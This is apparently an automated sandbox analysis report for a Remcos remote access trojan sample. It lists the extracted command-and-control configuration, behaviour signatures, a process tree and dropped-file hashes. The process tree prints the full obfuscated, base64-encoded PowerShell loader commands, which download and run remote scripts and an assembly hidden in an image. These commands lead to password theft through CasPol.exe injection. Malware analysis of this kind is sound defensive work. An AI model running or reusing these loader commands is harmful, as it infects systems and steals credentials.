remcos | eb991c96fa1503bfb9a160baa4c84bcef7a53287a064e7bcb21c83e989f1ffc9

Analysis

max time kernel
148s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
31-01-2025 07:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

seethebestthingstobesuccessfullygetbackwithentiretime.hta
Size

15KB
MD5

3ad24c21ca8cfdc1f7ea80d990a58cd1
SHA1

6e2d56eb9085869945b192c74874758ebdf033f9
SHA256

eb991c96fa1503bfb9a160baa4c84bcef7a53287a064e7bcb21c83e989f1ffc9
SHA512

71a8ba67fc2d15c7e420e1b8ca91a6445292b88e4db35517944e2671977e00418c97f963c1df8b9b34fc2a6912a6d2103f6587a9f7ce25fb4d48728c156f65c2
SSDEEP

48:3v6cylbcrSlb4zg9HLzIr5fcpy8veDYRjNx9bPyx6qLchrc7Qw4OllAc1G:frzg9rzYfEPG4jdPyoN

Score

10^/10

remcos remotehost collection defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

198.46.178.132:8690

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-RWD64Z
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/2640-108-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/2940-106-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/1584-105-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/1584-105-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/2940-106-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
17	3496	powershell.exe
20	2080	powershell.exe
21	2080	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
3496	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	CasPol.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2080	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2080 set thread context of 5056	2080	powershell.exe	98
PID 5056 set thread context of 2940	5056	CasPol.exe	100
PID 5056 set thread context of 1584	5056	CasPol.exe	101
PID 5056 set thread context of 2640	5056	CasPol.exe	102

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
3496	powershell.exe
3496	powershell.exe
2080	powershell.exe
2080	powershell.exe
2080	powershell.exe
2080	powershell.exe
2940	CasPol.exe
2940	CasPol.exe
2640	CasPol.exe
2640	CasPol.exe
2940	CasPol.exe
2940	CasPol.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
5056	CasPol.exe
5056	CasPol.exe
5056	CasPol.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3496	powershell.exe
Token: SeDebugPrivilege	2080	powershell.exe
Token: SeDebugPrivilege	2640	CasPol.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5056	CasPol.exe

Suspicious use of WriteProcessMemory 43 IoCs

description	pid	Process	procid_target
PID 1692 wrote to memory of 5104	1692	mshta.exe	88
PID 1692 wrote to memory of 5104	1692	mshta.exe	88
PID 1692 wrote to memory of 5104	1692	mshta.exe	88
PID 5104 wrote to memory of 3496	5104	cmd.exe	90
PID 5104 wrote to memory of 3496	5104	cmd.exe	90
PID 5104 wrote to memory of 3496	5104	cmd.exe	90
PID 3496 wrote to memory of 3096	3496	powershell.exe	91
PID 3496 wrote to memory of 3096	3496	powershell.exe	91
PID 3496 wrote to memory of 3096	3496	powershell.exe	91
PID 3096 wrote to memory of 2024	3096	csc.exe	92
PID 3096 wrote to memory of 2024	3096	csc.exe	92
PID 3096 wrote to memory of 2024	3096	csc.exe	92
PID 3496 wrote to memory of 932	3496	powershell.exe	93
PID 3496 wrote to memory of 932	3496	powershell.exe	93
PID 3496 wrote to memory of 932	3496	powershell.exe	93
PID 932 wrote to memory of 2080	932	WScript.exe	94
PID 932 wrote to memory of 2080	932	WScript.exe	94
PID 932 wrote to memory of 2080	932	WScript.exe	94
PID 2080 wrote to memory of 3800	2080	powershell.exe	97
PID 2080 wrote to memory of 3800	2080	powershell.exe	97
PID 2080 wrote to memory of 3800	2080	powershell.exe	97
PID 2080 wrote to memory of 5056	2080	powershell.exe	98
PID 2080 wrote to memory of 5056	2080	powershell.exe	98
PID 2080 wrote to memory of 5056	2080	powershell.exe	98
PID 2080 wrote to memory of 5056	2080	powershell.exe	98
PID 2080 wrote to memory of 5056	2080	powershell.exe	98
PID 2080 wrote to memory of 5056	2080	powershell.exe	98
PID 2080 wrote to memory of 5056	2080	powershell.exe	98
PID 2080 wrote to memory of 5056	2080	powershell.exe	98
PID 2080 wrote to memory of 5056	2080	powershell.exe	98
PID 2080 wrote to memory of 5056	2080	powershell.exe	98
PID 5056 wrote to memory of 2940	5056	CasPol.exe	100
PID 5056 wrote to memory of 2940	5056	CasPol.exe	100
PID 5056 wrote to memory of 2940	5056	CasPol.exe	100
PID 5056 wrote to memory of 2940	5056	CasPol.exe	100
PID 5056 wrote to memory of 1584	5056	CasPol.exe	101
PID 5056 wrote to memory of 1584	5056	CasPol.exe	101
PID 5056 wrote to memory of 1584	5056	CasPol.exe	101
PID 5056 wrote to memory of 1584	5056	CasPol.exe	101
PID 5056 wrote to memory of 2640	5056	CasPol.exe	102
PID 5056 wrote to memory of 2640	5056	CasPol.exe	102
PID 5056 wrote to memory of 2640	5056	CasPol.exe	102
PID 5056 wrote to memory of 2640	5056	CasPol.exe	102

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingstobesuccessfullygetbackwithentiretime.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1692
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c pOwerSHELL -Ex byPass -NOP -W 1 -C dEviceCrEDENTiALdepLoyMENt.EXe ; InVOkE-ExPReSsION($(inVOkE-exPResSioN('[SySTem.TeXT.ENCoDING]'+[chAR]58+[cHar]0X3A+'utF8.gETstRing([SYSTem.coNVERT]'+[CHar]0X3a+[cHAr]0x3A+'FROMbAse64STRIng('+[chAR]0X22+'JHZGbWdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJlcmRFRmlOaXRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnlvUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaVUZITUp0LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcVZ5enFxb21KLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ6dHpsR0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsRVhFV1NqZ1VBIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXellXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Rm1nYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy43Mi8xMjAvc2VldGhlYmVzdHRoaW5nc2ZvcmVudGlyZXRpbWVnaXZlbm1lYmVzdGZvcm1lLmdJRiIsIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzZm9yZW50aXJldGltZWdpdmVubWViZXN0Zm9ybS52YnMiLDAsMCk7c3RhcnQtU0xlRVAoMyk7SU52b2tFLWVYcFJlc3NpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JlbnRpcmV0aW1lZ2l2ZW5tZWJlc3Rmb3JtLnZicyI='+[cHar]0X22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5104
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOwerSHELL -Ex byPass -NOP -W 1 -C dEviceCrEDENTiALdepLoyMENt.EXe ; InVOkE-ExPReSsION($(inVOkE-exPResSioN('[SySTem.TeXT.ENCoDING]'+[chAR]58+[cHar]0X3A+'utF8.gETstRing([SYSTem.coNVERT]'+[CHar]0X3a+[cHAr]0x3A+'FROMbAse64STRIng('+[chAR]0X22+'JHZGbWdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJlcmRFRmlOaXRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnlvUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaVUZITUp0LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcVZ5enFxb21KLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ6dHpsR0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsRVhFV1NqZ1VBIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXellXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Rm1nYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy43Mi8xMjAvc2VldGhlYmVzdHRoaW5nc2ZvcmVudGlyZXRpbWVnaXZlbm1lYmVzdGZvcm1lLmdJRiIsIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzZm9yZW50aXJldGltZWdpdmVubWViZXN0Zm9ybS52YnMiLDAsMCk7c3RhcnQtU0xlRVAoMyk7SU52b2tFLWVYcFJlc3NpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JlbnRpcmV0aW1lZ2l2ZW5tZWJlc3Rmb3JtLnZicyI='+[cHar]0X22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3496
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kii1so3e\kii1so3e.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3096
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCD23.tmp" "c:\Users\Admin\AppData\Local\Temp\kii1so3e\CSCB76F153626854DB0B36DCB5B81FE235.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2024
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingsforentiretimegivenmebestform.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:932
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZQBtAHIAbwBmAHMAZwBuAGkAaAB0AHQAcwBlAGIAawBjAGEAYgB0AGUAZwBvAHQAeQBhAHcAcgBlAHQAdABlAGIALwAwADIAMQAvADIANwAuADcALgA4ADYAMQAuADQAMAAxAC8ALwA6AHAAdAB0AGgAJwA7ACQAcgBlAHMAdABvAHIAZQBkAFQAZQB4AHQAIAA9ACAAJABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAC0AcgBlAHAAbABhAGMAZQAgACcAIwAnACwAIAAnAHQAJwA7ACQAaQBtAGEAZwBlAFUAcgBsACAAPQAgACcAaAB0AHQAcABzADoALwAvAHIAZQBzAC4AYwBsAG8AdQBkAGkAbgBhAHIAeQAuAGMAbwBtAC8AZABhAHgAdwB1AGEANgAzAHkALwBpAG0AYQBnAGUALwB1AHAAbABvAGEAZAAvAHYAMQA3ADMANwA2ADkANgAxADcAMQAvAGgAZQBrAGUAMgBwAG0AdABlAHUAdwA4AHMAcQBzAHAAbABoAGsAbAAuAGoAcABnACcAOwAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACQAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgACQAZQBuAGQASQBuAGQAZQB4ACAALQAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdABhAHIAdABJAG4AZABlAHgALAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7ACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7ACQAdAB5AHAAZQAgAD0AIABbAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAbQBhAGkAbgAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgAEAAKAAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACwAJwBmAGEAbABzAGUAJwAsACcAQwBhAHMAUABvAGwAJwAsACcAZgBhAGwAcwBlACcAKQApAA==')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2080
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        
        PID:3800
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:5056
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\jlpryzheztydxdnbtqlfpyuzxunelwc"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2940
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ufvj"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:1584
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\whacakd"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
102B

MD5
e2f657abce2965efd187453257eeadd4

SHA1
56cb4000da7fb6e32a6344a78218f7df01a82f23

SHA256
ae6e4aff52ee72057c456d01cff572f26dd8f984b2938c4661b75a0c96088e6c

SHA512
2546662fd0ee1ad963640af186beeb0fe2dd9aa9c8b455c0749347f80f65079a524954711d1ac5ec38b5455b858ec8206707bef92aa034a820dd07dc11c91a18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
245ddbf465d0ab931bde2d80a9bc1754

SHA1
7348f33d90b86272de8e2312093356a20d62573c

SHA256
fcfe5ed1b2f004397a902495a81ac4ec20e4e81c0e2f11247c2868bf4d41b9e1

SHA512
2468dd2a24adc9bc6abc344ffd9d9f24a062d3bd27ff1ae7971a581162ed737dad29ac959e10d1bbf5912b4ff087412b59a7a2cea3017188da9302a322d3bcd5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESCD23.tmp

Filesize
1KB

MD5
4ed8617e4380dd45d50801e93bb56899

SHA1
49372e7db88cbe86550f8c4a2f843aecf1e4b1c2

SHA256
e63fe8e4fc06fd72e34627682c69e03170e2b5b9dcd40f390e0d1b0e24a6c1ff

SHA512
98b221f522dd87a1b80c53ae0dcf153e10c41579c1c2559cb3159e1965c20a8c3ef54da96eab8a1a35ed28db4ed6b130609d3fb989044912ff241485b8a6c50b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rkwl5h2q.gft.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\jlpryzheztydxdnbtqlfpyuzxunelwc

Filesize
4KB

MD5
0e98efb5de87ad56d65832c99afbaa33

SHA1
467d68f10d14e92372197913f3d8a0277c5ecb44

SHA256
0e10bed8e4c5b10bb0b407f0394452fad6f6914489981e8ffde4855ad90dd59e

SHA512
5a7ca92c47dfaeab43250b0756ee52cc601ed166305c345ffac9820af9a3aa7110f5262e9bbcfb8d8c48eb7381f5af60ba7f756da3c546e6a3cd20a22c32dd5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\kii1so3e\kii1so3e.dll

Filesize
3KB

MD5
27be7ddc0a8aada404118d9c170f366e

SHA1
31e076f335795e267f93954e84771c05c05a4c25

SHA256
a4a4889ce46e85a1b33dac7e6b5348169a3de04fbff80012d7d80908dd96ea9b

SHA512
842dd13ec34303d45f73dbc42842e3e93c79fd26db799d81f4592261fd01223ea2215df42f99678964894543c4d5cbeceffa063416a30cbbec612b9bcbdd4d64

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestthingsforentiretimegivenmebestform.vbs

Filesize
229KB

MD5
88f23c1da68cf667cec4b361448b8367

SHA1
028988c872f4793172929f914e7c0dbb145397d8

SHA256
3b2b162a74ce403dff15fe96e5623cffdf3326e57949cdd1ecf5ffe9ad155bee

SHA512
97bfb73a8e0c81e8309dcbdf7b8bd4df826c1c18225c483a12929e1bec87332dcf3bd0f01d4ce9f981d63c685a40449b84a618ae5f9afe7b1ecbea05603fdbb5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kii1so3e\CSCB76F153626854DB0B36DCB5B81FE235.TMP

Filesize
652B

MD5
f49f80a030721e87ffb2bba9a6cfa21a

SHA1
f3333c58323fb01308bb7a45a90b69febcc0b756

SHA256
1a72acf1ea2c8617808be4e9cc4156acbb9652a70cec790eab41f73a63f231df

SHA512
a021c145c4a293cb552dbc1dfd370971cbd411728f624c141e52fcf50aca2d513032396d8a14a141c50256c7114fb215b802bd54a960ff888b1402f0a6725065

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kii1so3e\kii1so3e.0.cs

Filesize
477B

MD5
788c3576e3dc8f95e6eef8576140abc7

SHA1
23441802614b7925dfb9a627dddf94345081369f

SHA256
eb34dc7736008d75241298fb305f6a59e599ae41a8f58a4eeddd3cef9a9f00d3

SHA512
7321860df913545e1bd998f21a941bc82f9fbb84b95b072c0c61d5eb906032b0ec22c8a49bbed2573faff923f4f4f8de45222bf40f1d07fd1092c4ff6dcb1678

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kii1so3e\kii1so3e.cmdline

Filesize
369B

MD5
696faacff4f349a63f56ad8bdc733395

SHA1
5f85f152514d34fc4248c88dcaa444fab6be88e5

SHA256
b9fc46d8118fe0e50268ac8981b79c182e9d68f96c12e86dbf26e1ea83916850

SHA512
cecdb928f72cef0ecb294c502900717d9d30b6f46163b378134200186ece98c4c56d89300e12a444284841dcb0777711e6fb260f4ba16549b6384b22dd8e121b

Download Submit
memory/1584-105-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1584-101-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1584-103-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2080-83-0x0000000007D80000-0x0000000007D94000-memory.dmp

Filesize
80KB

Download
memory/2080-84-0x0000000007D90000-0x0000000007D96000-memory.dmp

Filesize
24KB

Download
memory/2080-81-0x0000000006560000-0x00000000068B4000-memory.dmp

Filesize
3.3MB

Download
memory/2080-85-0x0000000007E80000-0x0000000007F1C000-memory.dmp

Filesize
624KB

Download
